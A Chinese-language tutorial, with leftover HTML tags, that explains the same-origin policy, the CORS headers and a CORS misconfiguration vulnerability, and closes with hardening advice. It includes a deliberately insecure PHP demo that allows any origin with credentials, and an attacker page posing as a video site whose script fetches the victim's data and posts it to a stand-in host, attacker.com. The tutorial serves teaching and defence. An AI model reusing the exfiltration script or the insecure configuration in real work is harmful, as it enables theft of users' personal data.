CORS跨域资源共享漏洞详解<\/h1>

同源策略基础<\/h2>

同源策略简介<\/h3>
同源策略(Same-Origin Policy)是浏览器的一种安全机制，用于限制一个源(域名、协议或端口号的组合)的文档或脚本如何与来自另一个源的资源进行交互。该策略阻止不同源之间的网页通过脚本访问对方的资源或执行恶意操作，有助于保护用户数据安全和隐私。<\/p>

同源要求<\/h3>

判断两个站点是否同源需要满足以下三个条件：<\/p>

协议<\/strong>相同<\/li>
域名<\/strong>相同<\/li>

端口<\/strong>相同<\/li> <\/ol>
只要有一项不满足，就属于不同源站点。当一个站点请求另一个站点的资源时，称为"跨域请求"，会受到同源策略的限制。<\/p>
不受同源策略影响的标签<\/h3>

<script><\/code><\/li>
``<\/li>
<iframe><\/code><\/li>
<link><\/code><\/li>
<style><\/code><\/li> <\/ul> CORS机制<\/h2> CORS简介<\/h3> CORS(Cross-Origin Resource Sharing，跨域资源共享)是HTML5提供的一种机制，允许WEB应用程序通过在HTTP头中增加特定字段来告诉浏览器哪些不同来源的服务器有权访问本站资源。<\/p> 需要CORS的常见场景<\/h3> 前后端分离的应用<\/li> 第三方API调用<\/li> CDN资源加载<\/li> 微服务架构<\/li> 跨域数据共享<\/li> 嵌入式内容(如YouTube视频、Google Maps等)<\/li> 跨域脚本与iframe通信<\/li> 单页应用(SPA)<\/li> <\/ol> CORS相关HTTP头部<\/h2> 请求头<\/h3> Origin<\/strong><\/p> 解释：请求的来源域名<\/li> 示例：Origin: http:\/\/example.com<\/code><\/li> 作用：浏览器在跨域请求时自动包含，服务器据此决定是否允许请求<\/li> <\/ul> <\/li> Access-Control-Request-Method<\/strong><\/p> 解释：预检请求中使用的方法<\/li> 示例：Access-Control-Request-Method: POST<\/code><\/li> 作用：通知服务器实际请求将使用的方法<\/li> <\/ul> <\/li> Access-Control-Request-Headers<\/strong><\/p> 解释：预检请求中使用的自定义头字段<\/li> 示例：Access-Control-Request-Headers: X-Custom-Header<\/code><\/li> 作用：通知服务器实际请求将包含的自定义头字段<\/li> <\/ul> <\/li> <\/ol> 响应头<\/h3> Access-Control-Allow-Origin<\/strong><\/p> 解释：允许的请求来源域名<\/li> 示例：Access-Control-Allow-Origin: http:\/\/example.com<\/code>或*<\/code><\/li> 作用：指示允许哪些域名访问资源<\/li> <\/ul> <\/li> Access-Control-Allow-Methods<\/strong><\/p> 解释：允许的HTTP方法<\/li> 示例：Access-Control-Allow-Methods: GET, POST, PUT<\/code><\/li> 作用：指示允许的HTTP方法<\/li> <\/ul> <\/li> Access-Control-Allow-Headers<\/strong><\/p> 解释：允许的自定义头字段<\/li> 示例：Access-Control-Allow-Headers: X-Custom-Header<\/code><\/li> 作用：指示允许的自定义头字段<\/li> <\/ul> <\/li> Access-Control-Allow-Credentials<\/strong><\/p> 解释：是否允许发送凭证(cookies、HTTP认证信息等)<\/li> 示例：Access-Control-Allow-Credentials: true<\/code><\/li> 作用：指示是否允许客户端发送凭证<\/li> <\/ul> <\/li> Access-Control-Expose-Headers<\/strong><\/p> 解释：允许客户端访问的响应头字段<\/li> 示例：Access-Control-Expose-Headers: X-Custom-Header<\/code><\/li> 作用：指示哪些响应头字段可被客户端脚本访问<\/li> <\/ul> <\/li> Access-Control-Max-Age<\/strong><\/p> 解释：预检请求结果的缓存时间(秒)<\/li> 示例：Access-Control-Max-Age: 3600<\/code><\/li> 作用：指示浏览器可缓存预检请求结果的时间<\/li> <\/ul> <\/li> <\/ol> CORS漏洞危害<\/h2> 信息泄露<\/strong>：攻击者可获取用户的敏感信息如cookies、会话令牌等<\/li> 跨站请求伪造(CSRF)<\/strong>：恶意网站可伪造用户请求<\/li> 窃取用户数据<\/strong>：API配置不当可能导致用户数据被直接访问<\/li> 权限提升<\/strong>：攻击者可执行高权限操作<\/li> 账户接管<\/strong>：通过获取敏感信息接管用户账户<\/li> <\/ol> CORS漏洞分析示例<\/h2> 被攻击端demo (admin.php)<\/h3> <?<\/span>php<\/span> <\/span><\/span>header<\/span>("Access-Control-Allow-Origin: *"<\/span>); <\/span><\/span>header<\/span>("Access-Control-Allow-Credentials: true"<\/span>); <\/span><\/span>header<\/span>("Content-Type: text\/html"<\/span>); <\/span><\/span> <\/span><\/span>if<\/span> ($_SERVER['REQUEST_METHOD'<\/span>] ===<\/span> 'GET'<\/span>) { <\/span><\/span> \/\/ 设置Cookie <\/span><\/span><\/span><\/span> setcookie<\/span>("sessionId"<\/span>, "7AsklYxjXt9AtUmt0askv0b3JeBP98trGrROoHn9YkM-1720927916406-0.0.1.1-604800000"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 嵌入HTML内容 <\/span><\/span><\/span><\/span> echo<\/span> '<!DOCTYPE html> <\/span><\/span><\/span> <html lang="zh-CN"> <\/span><\/span><\/span> <head> <\/span><\/span><\/span> <meta charset="UTF-8"> <\/span><\/span><\/span> <title>登录成功<\/title> <\/span><\/span><\/span> <\/head> <\/span><\/span><\/span> <body> <\/span><\/span><\/span> <h1>登录成功!欢迎您:admin!<\/h1> <\/span><\/span><\/span> <p>用户名:admin<\/p> <\/span><\/span><\/span> <p>姓名:张三<\/p> <\/span><\/span><\/span> <p>手机号:19090909090<\/p> <\/span><\/span><\/span> <p>身份证号:510937197709090909<\/p> <\/span><\/span><\/span> <\/body> <\/span><\/span><\/span> <\/html>'<\/span>; <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>攻击端demo (hacker.html)<\/h3> <!DOCTYPE html><\/span> <\/span><\/span><html<\/span> lang<\/span>=<\/span>"zh-CN"<\/span>> <\/span><\/span><head<\/span>> <\/span><\/span> <meta<\/span> charset<\/span>=<\/span>"UTF-8"<\/span>> <\/span><\/span> <title<\/span>>深夜天堂-在线观看<\/title<\/span>> <\/span><\/span><\/head<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span> <h1<\/span>>深夜天堂-在线观看<\/h1<\/span>> <\/span><\/span> <button<\/span> id<\/span>=<\/span>"attackButton"<\/span>>!点击开始观看!<\/button<\/span>> <\/span><\/span> <\/span><\/span> <script<\/span>> <\/span><\/span> document.getElementById<\/span>('attackButton'<\/span>).addEventListener<\/span>('click'<\/span>, function<\/span>() { <\/span><\/span> fetch<\/span>('http:\/\/www.x1lys.com\/admin.php'<\/span>, { <\/span><\/span> credentials<\/span>:<\/span> 'include'<\/span> <\/span><\/span> }) <\/span><\/span> .then<\/span>(response<\/span> => response<\/span>.text<\/span>()) <\/span><\/span> .then<\/span>(data<\/span> => { <\/span><\/span> \/\/ 将获取的数据发送到攻击者服务器 <\/span><\/span><\/span><\/span> fetch<\/span>('https:\/\/attacker.com\/steal'<\/span>, { <\/span><\/span> method<\/span>:<\/span> 'POST'<\/span>, <\/span><\/span> body<\/span>:<\/span> data<\/span> <\/span><\/span> }); <\/span><\/span> }); <\/span><\/span> }); <\/span><\/span> <\/script<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>漏洞原理分析<\/h2> 被攻击端设置了Access-Control-Allow-Origin: *<\/code>，允许任意来源的跨域请求<\/li> 同时设置了Access-Control-Allow-Credentials: true<\/code>，允许携带凭据(cookie等)<\/li> 攻击者构造恶意页面诱导用户点击，通过fetch API发起跨域请求<\/li> 由于CORS配置不当，攻击者可获取包含敏感信息的响应内容<\/li> 攻击者将获取的数据发送到自己的服务器<\/li> <\/ol> 安全建议<\/h2> 避免使用通配符<\/strong>*：不要设置Access-Control-Allow-Origin: *<\/code>，特别是当使用Access-Control-Allow-Credentials: true<\/code>时<\/li> 严格限制允许的来源<\/strong>：明确指定允许的域名，如Access-Control-Allow-Origin: https:\/\/trusted.example.com<\/code><\/li> 限制允许的方法<\/strong>：通过Access-Control-Allow-Methods<\/code>只开放必要的方法<\/li> 限制允许的头部<\/strong>：通过Access-Control-Allow-Headers<\/code>只开放必要的头部<\/li> 谨慎使用凭据<\/strong>：只有在确实需要时才设置Access-Control-Allow-Credentials: true<\/code><\/li> 设置适当的缓存时间<\/strong>：通过Access-Control-Max-Age<\/code>控制预检请求的缓存时间<\/li> 实施服务器端验证<\/strong>：即使配置了CORS，服务器端也应验证请求来源<\/li> <\/ol> 总结<\/h2> CORS机制为现代Web应用提供了必要的跨域通信能力，但不当的配置会导致严重的安全漏洞。开发者需要深入理解CORS的工作原理，在实现跨域资源共享的同时，确保应用的安全性。特别是在处理敏感数据时，必须严格限制允许的来源、方法和头部，避免信息泄露和跨站攻击。<\/p>